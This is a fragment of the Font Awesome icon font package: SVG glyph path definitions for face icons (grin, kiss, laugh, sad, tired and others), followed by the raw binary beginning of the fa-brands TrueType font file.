c10 3.2002 19.4004 -5.39941 17.7002 -15.2998c-8 -47.0996 -71.3994 -80 -123.3 -80zM450.3 216.3c-3.09961 -0.899414 -7.2002 0.100586 -9.2998 3.7002l-9.5 17c-7.7002 13.7002 -19.2002 21.5996 -31.5 21.5996s-23.7998 -7.89941 -31.5 -21.5996l-9.5 -17
c-1.90039 -3.2002 -5.7998 -4.7998 -9.2998 -3.7002c-3.60059 1.10059 -6 4.60059 -5.7002 8.2998c3.2998 42.1006 32.2002 71.4004 56 71.4004s52.7002 -29.2998 56 -71.4004c0.299805 -3.7998 -2.09961 -7.19922 -5.7002 -8.2998zM240 258.6
c-12.2998 0 -23.7998 -7.7998 -31.5 -21.5996l-9.5 -17c-1.90039 -3.2002 -5.7998 -4.7998 -9.2998 -3.7002c-3.60059 1.10059 -6 4.60059 -5.7002 8.2998c3.2998 42.1006 32.2002 71.4004 56 71.4004s52.7002 -29.2998 56 -71.4004
c0.299805 -3.7998 -2.09961 -7.19922 -5.7002 -8.2998c-3.09961 -1 -7.2002 0 -9.2998 3.7002l-9.5 17c-7.7002 13.7002 -19.2002 21.5996 -31.5 21.5996z" />
    <glyph glyph-name="grin-tongue" unicode="&#xf589;" horiz-adv-x="496" 
d="M248 440c137 0 248 -111 248 -248s-111 -248 -248 -248s-248 111 -248 248s111 248 248 248zM312 40h0.0996094v43.7998l-17.6992 8.7998c-15.1006 7.60059 -31.5 -1.69922 -34.9004 -16.5l-2.7998 -12.0996c-2.10059 -9.2002 -15.2002 -9.2002 -17.2998 0
l-2.80078 12.0996c-3.39941 14.8008 -19.8994 24 -34.8994 16.5l-17.7002 -8.7998v-42.7998c0 -35.2002 28 -64.5 63.0996 -65c35.8008 -0.5 64.9004 28.4004 64.9004 64zM340.2 14.7002c64 33.3994 107.8 100.3 107.8 177.3c0 110.3 -89.7002 200 -200 200
s-200 -89.7002 -200 -200c0 -77 43.7998 -143.9 107.8 -177.3c-2.2002 8.09961 -3.7998 16.5 -3.7998 25.2998v43.5c-14.2002 12.4004 -24.4004 27.5 -27.2998 44.5c-1.7002 10 7.7998 18.4004 17.7002 15.2998c26 -8.2998 64.3994 -13.0996 105.6 -13.0996
s79.7002 4.7998 105.6 13.0996c10 3.2002 19.4004 -5.39941 17.7002 -15.2998c-2.89941 -17 -13.0996 -32.0996 -27.2998 -44.5v-43.5c0 -8.7998 -1.59961 -17.2002 -3.7998 -25.2998zM168 272c17.7002 0 32 -14.2998 32 -32s-14.2998 -32 -32 -32s-32 14.2998 -32 32
s14.2998 32 32 32zM328 272c17.7002 0 32 -14.2998 32 -32s-14.2998 -32 -32 -32s-32 14.2998 -32 32s14.2998 32 32 32z" />
    <glyph glyph-name="grin-tongue-squint" unicode="&#xf58a;" horiz-adv-x="496" 
d="M248 440c137 0 248 -111 248 -248s-111 -248 -248 -248s-248 111 -248 248s111 248 248 248zM312 40h0.0996094v43.7998l-17.6992 8.7998c-15.1006 7.60059 -31.5 -1.69922 -34.9004 -16.5l-2.7998 -12.0996c-2.10059 -9.2002 -15.2002 -9.2002 -17.2998 0
l-2.80078 12.0996c-3.39941 14.8008 -19.8994 24 -34.8994 16.5l-17.7002 -8.7998v-42.7998c0 -35.2002 28 -64.5 63.0996 -65c35.8008 -0.5 64.9004 28.4004 64.9004 64zM340.2 14.7002c64 33.3994 107.8 100.3 107.8 177.3c0 110.3 -89.7002 200 -200 200
s-200 -89.7002 -200 -200c0 -77 43.7998 -143.9 107.8 -177.3c-2.2002 8.09961 -3.7998 16.5 -3.7998 25.2998v43.5c-14.2002 12.4004 -24.4004 27.5 -27.2998 44.5c-1.7002 10 7.7998 18.4004 17.7002 15.2998c26 -8.2998 64.3994 -13.0996 105.6 -13.0996
s79.7002 4.7998 105.6 13.0996c10 3.2002 19.4004 -5.39941 17.7002 -15.2998c-2.89941 -17 -13.0996 -32.0996 -27.2998 -44.5v-43.5c0 -8.7998 -1.59961 -17.2002 -3.7998 -25.2998zM377.1 295.8c3.80078 -4.39941 3.90039 -11 0.100586 -15.5l-33.6006 -40.2998
l33.6006 -40.2998c3.7002 -4.5 3.7002 -11 -0.100586 -15.5c-3.59961 -4.2002 -9.89941 -5.7002 -15.2998 -2.5l-80 48c-3.59961 2.2002 -5.7998 6.09961 -5.7998 10.2998s2.2002 8.09961 5.7998 10.2998l80 48c5 3 11.5 1.90039 15.2998 -2.5zM214.2 250.3
c3.59961 -2.2002 5.7998 -6.09961 5.7998 -10.2998s-2.2002 -8.09961 -5.7998 -10.2998l-80 -48c-5.40039 -3.2002 -11.7002 -1.7002 -15.2998 2.5c-3.80078 4.5 -3.90039 11 -0.100586 15.5l33.6006 40.2998l-33.6006 40.2998c-3.7002 4.5 -3.7002 11 0.100586 15.5
c3.89941 4.5 10.2998 5.5 15.2998 2.5z" />
    <glyph glyph-name="grin-tongue-wink" unicode="&#xf58b;" horiz-adv-x="496" 
d="M152 268c25.7002 0 55.9004 -16.9004 59.7998 -42.0996c0.799805 -5 -1.7002 -10 -6.09961 -12.4004c-5.7002 -3.09961 -11.2002 -0.599609 -13.7002 1.59961l-9.5 8.5c-14.7998 13.2002 -46.2002 13.2002 -61 0l-9.5 -8.5
c-3.7998 -3.39941 -9.2998 -4 -13.7002 -1.59961c-4.39941 2.40039 -6.89941 7.40039 -6.09961 12.4004c3.89941 25.1992 34.0996 42.0996 59.7998 42.0996zM328 320c44.2002 0 80 -35.7998 80 -80s-35.7998 -80 -80 -80s-80 35.7998 -80 80s35.7998 80 80 80zM328 192
c26.5 0 48 21.5 48 48s-21.5 48 -48 48s-48 -21.5 -48 -48s21.5 -48 48 -48zM328 264c13.2998 0 24 -10.7002 24 -24s-10.7002 -24 -24 -24s-24 10.7002 -24 24s10.7002 24 24 24zM248 440c137 0 248 -111 248 -248s-111 -248 -248 -248s-248 111 -248 248s111 248 248 248z
M312 40h0.0996094v43.7998l-17.6992 8.7998c-15.1006 7.60059 -31.5 -1.69922 -34.9004 -16.5l-2.7998 -12.0996c-2.10059 -9.2002 -15.2002 -9.2002 -17.2998 0l-2.80078 12.0996c-3.39941 14.8008 -19.8994 24 -34.8994 16.5l-17.7002 -8.7998v-42.7998
c0 -35.2002 28 -64.5 63.0996 -65c35.8008 -0.5 64.9004 28.4004 64.9004 64zM340.2 14.7002c64 33.3994 107.8 100.3 107.8 177.3c0 110.3 -89.7002 200 -200 200s-200 -89.7002 -200 -200c0 -77 43.7998 -143.9 107.8 -177.3
c-2.2002 8.09961 -3.7998 16.5 -3.7998 25.2998v43.5c-14.2002 12.4004 -24.4004 27.5 -27.2998 44.5c-1.7002 10 7.7998 18.4004 17.7002 15.2998c26 -8.2998 64.3994 -13.0996 105.6 -13.0996s79.7002 4.7998 105.6 13.0996c10 3.2002 19.4004 -5.39941 17.7002 -15.2998
c-2.89941 -17 -13.0996 -32.0996 -27.2998 -44.5v-43.5c0 -8.7998 -1.59961 -17.2002 -3.7998 -25.2998z" />
    <glyph glyph-name="grin-wink" unicode="&#xf58c;" horiz-adv-x="496" 
d="M328 268c25.6904 0 55.8799 -16.9199 59.8701 -42.1201c1.72949 -11.0898 -11.3506 -18.2695 -19.8301 -10.8398l-9.5498 8.47949c-14.8105 13.1904 -46.1602 13.1904 -60.9707 0l-9.5498 -8.47949c-8.33008 -7.40039 -21.5801 -0.379883 -19.8301 10.8398
c3.98047 25.2002 34.1699 42.1201 59.8604 42.1201zM168 208c-17.6699 0 -32 14.3301 -32 32s14.3301 32 32 32s32 -14.3301 32 -32s-14.3301 -32 -32 -32zM353.55 143.36c10.04 3.13965 19.3906 -5.4502 17.71 -15.3408
c-7.92969 -47.1494 -71.3193 -80.0195 -123.26 -80.0195s-115.33 32.8701 -123.26 80.0195c-1.69043 9.9707 7.76953 18.4707 17.71 15.3408c25.9297 -8.31055 64.3994 -13.0605 105.55 -13.0605s79.6201 4.75977 105.55 13.0605zM248 440c136.97 0 248 -111.03 248 -248
s-111.03 -248 -248 -248s-248 111.03 -248 248s111.03 248 248 248zM248 -8c110.28 0 200 89.7197 200 200s-89.7197 200 -200 200s-200 -89.7197 -200 -200s89.7197 -200 200 -200z" />
    <glyph glyph-name="kiss" unicode="&#xf596;" horiz-adv-x="496" 
d="M168 272c17.7002 0 32 -14.2998 32 -32s-14.2998 -32 -32 -32s-32 14.2998 -32 32s14.2998 32 32 32zM304 140c0 -13 -13.4004 -27.2998 -35.0996 -36.4004c21.7998 -8.69922 35.1992 -23 35.1992 -36c0 -19.1992 -28.6992 -41.5 -71.5 -44h-0.5
c-3.69922 0 -7 2.60059 -7.7998 6.2002c-0.899414 3.7998 1.10059 7.7002 4.7002 9.2002l17 7.2002c12.9004 5.5 20.7002 13.5 20.7002 21.5s-7.7998 16 -20.7998 21.5l-16.9004 7.2002c-6 2.59961 -5.7002 12.3994 0 14.7998l17 7.2002
c12.9004 5.5 20.7002 13.5 20.7002 21.5s-7.7998 16 -20.7998 21.5l-16.9004 7.19922c-3.59961 1.5 -5.59961 5.40039 -4.7002 9.2002c0.799805 3.7998 4.40039 6.60059 8.2002 6.2002c42.7002 -2.5 71.5 -24.7998 71.5 -44zM248 440c137 0 248 -111 248 -248
s-111 -248 -248 -248s-248 111 -248 248s111 248 248 248zM248 -8c110.3 0 200 89.7002 200 200s-89.7002 200 -200 200s-200 -89.7002 -200 -200s89.7002 -200 200 -200zM328 272c17.7002 0 32 -14.2998 32 -32s-14.2998 -32 -32 -32s-32 14.2998 -32 32s14.2998 32 32 32z
" />
    <glyph glyph-name="kiss-beam" unicode="&#xf597;" horiz-adv-x="496" 
d="M168 296c23.7998 0 52.7002 -29.2998 55.7998 -71.4004c0.299805 -3.7998 -2 -7.19922 -5.59961 -8.2998c-3.10059 -1 -7.2002 0 -9.2998 3.7002l-9.5 17c-7.7002 13.7002 -19.2002 21.5996 -31.5 21.5996c-12.3008 0 -23.8008 -7.89941 -31.5 -21.5996l-9.5 -17
c-1.80078 -3.2002 -5.80078 -4.7002 -9.30078 -3.7002c-3.59961 1.10059 -5.89941 4.60059 -5.59961 8.2998c3.2998 42.1006 32.2002 71.4004 56 71.4004zM248 440c137 0 248 -111 248 -248s-111 -248 -248 -248s-248 111 -248 248s111 248 248 248zM248 -8
c110.3 0 200 89.7002 200 200s-89.7002 200 -200 200s-200 -89.7002 -200 -200s89.7002 -200 200 -200zM304 140c0 -13 -13.4004 -27.2998 -35.0996 -36.4004c21.7998 -8.69922 35.1992 -23 35.1992 -36c0 -19.1992 -28.6992 -41.5 -71.5 -44h-0.5
c-3.69922 0 -7 2.60059 -7.7998 6.2002c-0.899414 3.7998 1.10059 7.7002 4.7002 9.2002l17 7.2002c12.9004 5.5 20.7002 13.5 20.7002 21.5s-7.7998 16 -20.7998 21.5l-16.9004 7.2002c-6 2.59961 -5.7002 12.3994 0 14.7998l17 7.2002
c12.9004 5.5 20.7002 13.5 20.7002 21.5s-7.7998 16 -20.7998 21.5l-16.9004 7.19922c-3.59961 1.5 -5.59961 5.40039 -4.7002 9.2002c0.799805 3.7998 4.40039 6.60059 8.2002 6.2002c42.7002 -2.5 71.5 -24.7998 71.5 -44zM328 296
c23.7998 0 52.7002 -29.2998 55.7998 -71.4004c0.299805 -3.7998 -2 -7.19922 -5.59961 -8.2998c-3.10059 -1 -7.2002 0 -9.2998 3.7002l-9.5 17c-7.7002 13.7002 -19.2002 21.5996 -31.5 21.5996c-12.3008 0 -23.8008 -7.89941 -31.5 -21.5996l-9.5 -17
c-1.80078 -3.2002 -5.80078 -4.7002 -9.30078 -3.7002c-3.59961 1.10059 -5.89941 4.60059 -5.59961 8.2998c3.2998 42.1006 32.2002 71.4004 56 71.4004z" />
    <glyph glyph-name="kiss-wink-heart" unicode="&#xf598;" horiz-adv-x="503" 
d="M304 139.5c0 -13 -13.4004 -27.2998 -35.0996 -36.4004c21.7998 -8.69922 35.1992 -23 35.1992 -36c0 -19.1992 -28.6992 -41.5 -71.5 -44h-0.5c-3.69922 0 -7 2.60059 -7.7998 6.2002c-0.899414 3.7998 1.10059 7.7002 4.7002 9.2002l17 7.2002
c12.9004 5.5 20.7002 13.5 20.7002 21.5s-7.7998 16 -20.7998 21.5l-16.9004 7.2002c-6 2.59961 -5.7002 12.3994 0 14.7998l17 7.2002c12.9004 5.5 20.7002 13.5 20.7002 21.5s-7.7998 16 -20.7998 21.5l-16.9004 7.19922c-3.59961 1.5 -5.59961 5.40039 -4.7002 9.2002
c0.799805 3.7998 4.40039 6.60059 8.2002 6.2002c42.7002 -2.5 71.5 -24.7998 71.5 -44zM374.5 223c-14.7998 13.2002 -46.2002 13.2002 -61 0l-9.5 -8.5c-2.5 -2.2998 -7.90039 -4.7002 -13.7002 -1.59961c-4.39941 2.39941 -6.89941 7.39941 -6.09961 12.3994
c3.89941 25.2002 34.2002 42.1006 59.7998 42.1006s55.7998 -16.9004 59.7998 -42.1006c0.799805 -5 -1.7002 -10 -6.09961 -12.3994c-4.40039 -2.40039 -9.90039 -1.7002 -13.7002 1.59961zM136 239.5c0 17.7002 14.2998 32 32 32s32 -14.2998 32 -32s-14.2998 -32 -32 -32
s-32 14.2998 -32 32zM501.1 45.5c9.2002 -23.9004 -4.39941 -49.4004 -28.5 -55.7002l-83 -21.5c-5.39941 -1.39941 -10.8994 1.7998 -12.3994 7.10059l-22.9004 82.5996c-6.59961 24 8.7998 48.5996 34 52.5996c22 3.5 43.1006 -11.5996 49 -33l2.2998 -8.39941
l8.40039 2.2002c21.5996 5.59961 45.0996 -5.10059 53.0996 -25.9004zM334 11.7002c17.7002 -64 10.9004 -39.5 13.4004 -46.7998c-30.5 -13.4004 -64 -20.9004 -99.4004 -20.9004c-137 0 -248 111 -248 248s111 248 248 248s248 -111 247.9 -248
c0 -31.7998 -6.2002 -62.0996 -17.1006 -90c-6 1.5 -12.2002 2.7998 -18.5996 2.90039c-5.60059 9.69922 -13.6006 17.5 -22.6006 23.8994c6.7002 19.9004 10.4004 41.1006 10.4004 63.2002c0 110.3 -89.7002 200 -200 200s-200 -89.7002 -200 -200s89.7002 -200 200 -200
c30.7998 0 59.9004 7.2002 86 19.7002z" />
    <glyph glyph-name="laugh" unicode="&#xf599;" horiz-adv-x="496" 
d="M248 440c137 0 248 -111 248 -248s-111 -248 -248 -248s-248 111 -248 248s111 248 248 248zM389.4 50.5996c37.7998 37.8008 58.5996 88 58.5996 141.4s-20.7998 103.6 -58.5996 141.4c-37.8008 37.7998 -88 58.5996 -141.4 58.5996s-103.6 -20.7998 -141.4 -58.5996
c-37.7998 -37.8008 -58.5996 -88 -58.5996 -141.4s20.7998 -103.6 58.5996 -141.4c37.8008 -37.7998 88 -58.5996 141.4 -58.5996s103.6 20.7998 141.4 58.5996zM328 224c-17.7002 0 -32 14.2998 -32 32s14.2998 32 32 32s32 -14.2998 32 -32s-14.2998 -32 -32 -32zM168 224
c-17.7002 0 -32 14.2998 -32 32s14.2998 32 32 32s32 -14.2998 32 -32s-14.2998 -32 -32 -32zM362.4 160c8.19922 0 14.5 -7 13.5 -15c-7.5 -59.2002 -58.9004 -105 -121.101 -105h-13.5996c-62.2002 0 -113.601 45.7998 -121.101 105c-1 8 5.30078 15 13.5 15h228.801z" />
    <glyph glyph-name="laugh-beam" unicode="&#xf59a;" horiz-adv-x="496" 
d="M248 440c137 0 248 -111 248 -248s-111 -248 -248 -248s-248 111 -248 248s111 248 248 248zM389.4 50.5996c37.7998 37.8008 58.5996 88 58.5996 141.4s-20.7998 103.6 -58.5996 141.4c-37.8008 37.7998 -88 58.5996 -141.4 58.5996s-103.6 -20.7998 -141.4 -58.5996
c-37.7998 -37.8008 -58.5996 -88 -58.5996 -141.4s20.7998 -103.6 58.5996 -141.4c37.8008 -37.7998 88 -58.5996 141.4 -58.5996s103.6 20.7998 141.4 58.5996zM328 296c23.7998 0 52.7002 -29.2998 55.7998 -71.4004c0.700195 -8.5 -10.7998 -11.8994 -14.8994 -4.5
l-9.5 17c-7.7002 13.7002 -19.2002 21.6006 -31.5 21.6006c-12.3008 0 -23.8008 -7.90039 -31.5 -21.6006l-9.5 -17c-4.10059 -7.39941 -15.6006 -4.09961 -14.9004 4.5c3.2998 42.1006 32.2002 71.4004 56 71.4004zM127 220.1c-4.2002 -7.39941 -15.7002 -4 -15.0996 4.5
c3.2998 42.1006 32.1992 71.4004 56 71.4004c23.7998 0 52.6992 -29.2998 56 -71.4004c0.699219 -8.5 -10.8008 -11.8994 -14.9004 -4.5l-9.5 17c-7.7002 13.7002 -19.2002 21.6006 -31.5 21.6006s-23.7998 -7.90039 -31.5 -21.6006zM362.4 160c8.19922 0 14.5 -7 13.5 -15
c-7.5 -59.2002 -58.9004 -105 -121.101 -105h-13.5996c-62.2002 0 -113.601 45.7998 -121.101 105c-1 8 5.30078 15 13.5 15h228.801z" />
    <glyph glyph-name="laugh-squint" unicode="&#xf59b;" horiz-adv-x="496" 
d="M248 440c137 0 248 -111 248 -248s-111 -248 -248 -248s-248 111 -248 248s111 248 248 248zM389.4 50.5996c37.7998 37.8008 58.5996 88 58.5996 141.4s-20.7998 103.6 -58.5996 141.4c-37.8008 37.7998 -88 58.5996 -141.4 58.5996s-103.6 -20.7998 -141.4 -58.5996
c-37.7998 -37.8008 -58.5996 -88 -58.5996 -141.4s20.7998 -103.6 58.5996 -141.4c37.8008 -37.7998 88 -58.5996 141.4 -58.5996s103.6 20.7998 141.4 58.5996zM343.6 252l33.6006 -40.2998c8.59961 -10.4004 -3.90039 -24.7998 -15.4004 -18l-80 48
c-7.7998 4.7002 -7.7998 15.8994 0 20.5996l80 48c11.6006 6.7998 24 -7.7002 15.4004 -18zM134.2 193.7c-11.6006 -6.7998 -24.1006 7.59961 -15.4004 18l33.6006 40.2998l-33.6006 40.2998c-8.59961 10.2998 3.7998 24.9004 15.4004 18l80 -48
c7.7998 -4.7002 7.7998 -15.8994 0 -20.5996zM362.4 160c8.19922 0 14.5 -7 13.5 -15c-7.5 -59.2002 -58.9004 -105 -121.101 -105h-13.5996c-62.2002 0 -113.601 45.7998 -121.101 105c-1 8 5.30078 15 13.5 15h228.801z" />
    <glyph glyph-name="laugh-wink" unicode="&#xf59c;" horiz-adv-x="496" 
d="M248 440c137 0 248 -111 248 -248s-111 -248 -248 -248s-248 111 -248 248s111 248 248 248zM389.4 50.5996c37.7998 37.8008 58.5996 88 58.5996 141.4s-20.7998 103.6 -58.5996 141.4c-37.8008 37.7998 -88 58.5996 -141.4 58.5996s-103.6 -20.7998 -141.4 -58.5996
c-37.7998 -37.8008 -58.5996 -88 -58.5996 -141.4s20.7998 -103.6 58.5996 -141.4c37.8008 -37.7998 88 -58.5996 141.4 -58.5996s103.6 20.7998 141.4 58.5996zM328 284c25.7002 0 55.9004 -16.9004 59.7002 -42.0996c1.7998 -11.1006 -11.2998 -18.2002 -19.7998 -10.8008
l-9.5 8.5c-14.8008 13.2002 -46.2002 13.2002 -61 0l-9.5 -8.5c-8.30078 -7.39941 -21.5 -0.399414 -19.8008 10.8008c4 25.1992 34.2002 42.0996 59.9004 42.0996zM168 224c-17.7002 0 -32 14.2998 -32 32s14.2998 32 32 32s32 -14.2998 32 -32s-14.2998 -32 -32 -32z
M362.4 160c8.19922 0 14.5 -7 13.5 -15c-7.5 -59.2002 -58.9004 -105 -121.101 -105h-13.5996c-62.2002 0 -113.601 45.7998 -121.101 105c-1 8 5.30078 15 13.5 15h228.801z" />
    <glyph glyph-name="meh-blank" unicode="&#xf5a4;" horiz-adv-x="496" 
d="M248 440c137 0 248 -111 248 -248s-111 -248 -248 -248s-248 111 -248 248s111 248 248 248zM248 -8c110.3 0 200 89.7002 200 200s-89.7002 200 -200 200s-200 -89.7002 -200 -200s89.7002 -200 200 -200zM168 272c17.7002 0 32 -14.2998 32 -32s-14.2998 -32 -32 -32
s-32 14.2998 -32 32s14.2998 32 32 32zM328 272c17.7002 0 32 -14.2998 32 -32s-14.2998 -32 -32 -32s-32 14.2998 -32 32s14.2998 32 32 32z" />
    <glyph glyph-name="meh-rolling-eyes" unicode="&#xf5a5;" horiz-adv-x="496" 
d="M248 440c137 0 248 -111 248 -248s-111 -248 -248 -248s-248 111 -248 248s111 248 248 248zM248 -8c110.3 0 200 89.7002 200 200s-89.7002 200 -200 200s-200 -89.7002 -200 -200s89.7002 -200 200 -200zM336 296c39.7998 0 72 -32.2002 72 -72s-32.2002 -72 -72 -72
s-72 32.2002 -72 72s32.2002 72 72 72zM336 184c22.0996 0 40 17.9004 40 40c0 13.5996 -7.2998 25.0996 -17.7002 32.2998c1 -2.59961 1.7002 -5.39941 1.7002 -8.2998c0 -13.2998 -10.7002 -24 -24 -24s-24 10.7002 -24 24c0 3 0.700195 5.7002 1.7002 8.2998
c-10.4004 -7.2002 -17.7002 -18.7002 -17.7002 -32.2998c0 -22.0996 17.9004 -40 40 -40zM232 224c0 -39.7998 -32.2002 -72 -72 -72s-72 32.2002 -72 72s32.2002 72 72 72s72 -32.2002 72 -72zM120 224c0 -22.0996 17.9004 -40 40 -40s40 17.9004 40 40
c0 13.5996 -7.2998 25.0996 -17.7002 32.2998c1 -2.59961 1.7002 -5.39941 1.7002 -8.2998c0 -13.2998 -10.7002 -24 -24 -24s-24 10.7002 -24 24c0 3 0.700195 5.7002 1.7002 8.2998c-10.4004 -7.2002 -17.7002 -18.7002 -17.7002 -32.2998zM312 96
c13.2002 0 24 -10.7998 24 -24s-10.7998 -24 -24 -24h-128c-13.2002 0 -24 10.7998 -24 24s10.7998 24 24 24h128z" />
    <glyph glyph-name="sad-cry" unicode="&#xf5b3;" horiz-adv-x="496" 
d="M248 440c137 0 248 -111 248 -248s-111 -248 -248 -248s-248 111 -248 248s111 248 248 248zM392 53.5996c34.5996 35.9004 56 84.7002 56 138.4c0 110.3 -89.7002 200 -200 200s-200 -89.7002 -200 -200c0 -53.7002 21.4004 -102.4 56 -138.4v114.4
c0 13.2002 10.7998 24 24 24s24 -10.7998 24 -24v-151.4c28.5 -15.5996 61.2002 -24.5996 96 -24.5996s67.5 9 96 24.5996v151.4c0 13.2002 10.7998 24 24 24s24 -10.7998 24 -24v-114.4zM205.8 213.5c-5.7998 -3.2002 -11.2002 -0.700195 -13.7002 1.59961l-9.5 8.5
c-14.7998 13.2002 -46.1992 13.2002 -61 0l-9.5 -8.5c-3.7998 -3.39941 -9.2998 -4 -13.6992 -1.59961c-4.40039 2.40039 -6.90039 7.40039 -6.10059 12.4004c3.90039 25.1992 34.2002 42.0996 59.7998 42.0996c25.6006 0 55.8008 -16.9004 59.8008 -42.0996
c0.799805 -5 -1.7002 -10 -6.10059 -12.4004zM344 268c25.7002 0 55.9004 -16.9004 59.7998 -42.0996c0.799805 -5 -1.7002 -10 -6.09961 -12.4004c-5.7002 -3.09961 -11.2002 -0.599609 -13.7002 1.59961l-9.5 8.5c-14.7998 13.2002 -46.2002 13.2002 -61 0l-9.5 -8.5
c-3.7998 -3.39941 -9.2002 -4 -13.7002 -1.59961c-4.39941 2.40039 -6.89941 7.40039 -6.09961 12.4004c3.89941 25.1992 34.0996 42.0996 59.7998 42.0996zM248 176c30.9004 0 56 -28.7002 56 -64s-25.0996 -64 -56 -64s-56 28.7002 -56 64s25.0996 64 56 64z" />
    <glyph glyph-name="sad-tear" unicode="&#xf5b4;" horiz-adv-x="496" 
d="M248 440c137 0 248 -111 248 -248s-111 -248 -248 -248s-248 111 -248 248s111 248 248 248zM248 -8c110.3 0 200 89.7002 200 200s-89.7002 200 -200 200s-200 -89.7002 -200 -200s89.7002 -200 200 -200zM256 144c38.0996 0 74 -16.7998 98.5 -46.0996
c8.5 -10.2002 7.09961 -25.3008 -3.09961 -33.8008c-10.6006 -8.7998 -25.7002 -6.69922 -33.8008 3.10059c-15.2998 18.2998 -37.7998 28.7998 -61.5996 28.7998c-13.2002 0 -24 10.7998 -24 24s10.7998 24 24 24zM168 208c-17.7002 0 -32 14.2998 -32 32s14.2998 32 32 32
s32 -14.2998 32 -32s-14.2998 -32 -32 -32zM328 272c17.7002 0 32 -14.2998 32 -32s-14.2998 -32 -32 -32s-32 14.2998 -32 32s14.2998 32 32 32zM162.4 173.2c2.7998 3.7002 8.39941 3.7002 11.1992 0c11.4004 -15.2998 36.4004 -50.6006 36.4004 -68.1006
c0 -22.6992 -18.7998 -41.0996 -42 -41.0996s-42 18.4004 -42 41.0996c0 17.5 25 52.8008 36.4004 68.1006z" />
    <glyph glyph-name="smile-beam" unicode="&#xf5b8;" horiz-adv-x="496" 
d="M248 440c137 0 248 -111 248 -248s-111 -248 -248 -248s-248 111 -248 248s111 248 248 248zM248 -8c110.3 0 200 89.7002 200 200s-89.7002 200 -200 200s-200 -89.7002 -200 -200s89.7002 -200 200 -200zM332 135.4c8.5 10.1992 23.5996 11.5 33.7998 3.09961
c10.2002 -8.5 11.6006 -23.5996 3.10059 -33.7998c-30 -36 -74.1006 -56.6006 -120.9 -56.6006s-90.9004 20.6006 -120.9 56.6006c-8.39941 10.2002 -7.09961 25.2998 3.10059 33.7998c10.2002 8.40039 25.2998 7.09961 33.7998 -3.09961
c20.7998 -25.1006 51.5 -39.4004 84 -39.4004s63.2002 14.4004 84 39.4004zM136.5 237l-9.5 -17c-1.90039 -3.2002 -5.90039 -4.7998 -9.2998 -3.7002c-3.60059 1.10059 -6 4.60059 -5.7002 8.2998c3.2998 42.1006 32.2002 71.4004 56 71.4004s52.7002 -29.2998 56 -71.4004
c0.299805 -3.7998 -2.09961 -7.19922 -5.7002 -8.2998c-3.09961 -1 -7.2002 0 -9.2998 3.7002l-9.5 17c-7.7002 13.7002 -19.2002 21.5996 -31.5 21.5996s-23.7998 -7.89941 -31.5 -21.5996zM328 296c23.7998 0 52.7002 -29.2998 56 -71.4004
c0.299805 -3.7998 -2.09961 -7.19922 -5.7002 -8.2998c-3.09961 -1 -7.2002 0 -9.2998 3.7002l-9.5 17c-7.7002 13.7002 -19.2002 21.5996 -31.5 21.5996s-23.7998 -7.89941 -31.5 -21.5996l-9.5 -17c-1.90039 -3.2002 -5.7998 -4.7998 -9.2998 -3.7002
c-3.60059 1.10059 -6 4.60059 -5.7002 8.2998c3.2998 42.1006 32.2002 71.4004 56 71.4004z" />
    <glyph glyph-name="surprise" unicode="&#xf5c2;" horiz-adv-x="496" 
d="M248 440c137 0 248 -111 248 -248s-111 -248 -248 -248s-248 111 -248 248s111 248 248 248zM248 -8c110.3 0 200 89.7002 200 200s-89.7002 200 -200 200s-200 -89.7002 -200 -200s89.7002 -200 200 -200zM248 168c35.2998 0 64 -28.7002 64 -64s-28.7002 -64 -64 -64
s-64 28.7002 -64 64s28.7002 64 64 64zM200 240c0 -17.7002 -14.2998 -32 -32 -32s-32 14.2998 -32 32s14.2998 32 32 32s32 -14.2998 32 -32zM328 272c17.7002 0 32 -14.2998 32 -32s-14.2998 -32 -32 -32s-32 14.2998 -32 32s14.2998 32 32 32z" />
    <glyph glyph-name="tired" unicode="&#xf5c8;" horiz-adv-x="496" 
d="M248 440c137 0 248 -111 248 -248s-111 -248 -248 -248s-248 111 -248 248s111 248 248 248zM248 -8c110.3 0 200 89.7002 200 200s-89.7002 200 -200 200s-200 -89.7002 -200 -200s89.7002 -200 200 -200zM377.1 295.8c3.80078 -4.39941 3.90039 -11 0.100586 -15.5
l-33.6006 -40.2998l33.6006 -40.2998c3.7998 -4.5 3.7002 -11 -0.100586 -15.5c-3.5 -4.10059 -9.89941 -5.7002 -15.2998 -2.5l-80 48c-3.59961 2.2002 -5.7998 6.09961 -5.7998 10.2998s2.2002 8.09961 5.7998 10.2998l80 48c5 2.90039 11.5 1.90039 15.2998 -2.5z
M220 240c0 -4.2002 -2.2002 -8.09961 -5.7998 -10.2998l-80 -48c-5.40039 -3.2002 -11.7998 -1.60059 -15.2998 2.5c-3.80078 4.5 -3.90039 11 -0.100586 15.5l33.6006 40.2998l-33.6006 40.2998c-3.7998 4.5 -3.7002 11 0.100586 15.5
c3.7998 4.40039 10.2998 5.5 15.2998 2.5l80 -48c3.59961 -2.2002 5.7998 -6.09961 5.7998 -10.2998zM248 176c45.4004 0 100.9 -38.2998 107.8 -93.2998c1.5 -11.9004 -7 -21.6006 -15.5 -17.9004c-22.7002 9.7002 -56.2998 15.2002 -92.2998 15.2002
s-69.5996 -5.5 -92.2998 -15.2002c-8.60059 -3.7002 -17 6.10059 -15.5 17.9004c6.89941 55 62.3994 93.2998 107.8 93.2998z" />
  </font>
</defs></svg>
PK!w��vX�X�&fontawesome/webfonts/fa-brands-400.ttfnu&1i�
�PFFTM�qq�<GDEF*��OS/2B�/X`cmap��<jgasp���glyf��p���$head���6hhea5�$hmtx�}��loca�.<
�Dmaxp
O8 name�uu"�post��Ԑ�IyX�N�9_<�؈��؈��������������L'@��LfGLf��PfEd������.�T�:� �����������������@���������?�x�� �	�p��?������������@� �@����@�?
�����@
�
}����@@@@@@���.�@
��@��������@���@@�	@��@��������������������� @������� ������������
�?���������������������@��������������Mg����?�������������������P��` ����������������������@ ������@��?���@������������F�������������@�������������@���@���������������q�j�c@@�������@y�������������������E���
����������������c������#�������Y����:������������U�����������w���w
�dH����������6�<�Z�i�n�q�t�~���������������������	���2�7�>�L�^�k�n�p�~�����������������\�u�}�����������������������������������
�!�#�1�M�R�W�Y����������������������������?�B���������1�]�x�{��������������������������������6�;�Z�g�k�p�s�y�����������������������
��1�7�:�K�^�`�m�p�|�����������������\�h�x�������������������������������������#�%�M�R�W�Y������
�����������������������?�B���������0�]�x�z�����������������������ytn8-�������������������zwhedXTQP620$
�
�
�
�
�
�
�
�
�
�
R
G
E
D
B
@
>
=
<
:
9
8
7
5
3
2
1
.
-
+
*
)
(
%
$
 




����xjiY�������������lj><
�
�
�
�
�
�
V
+




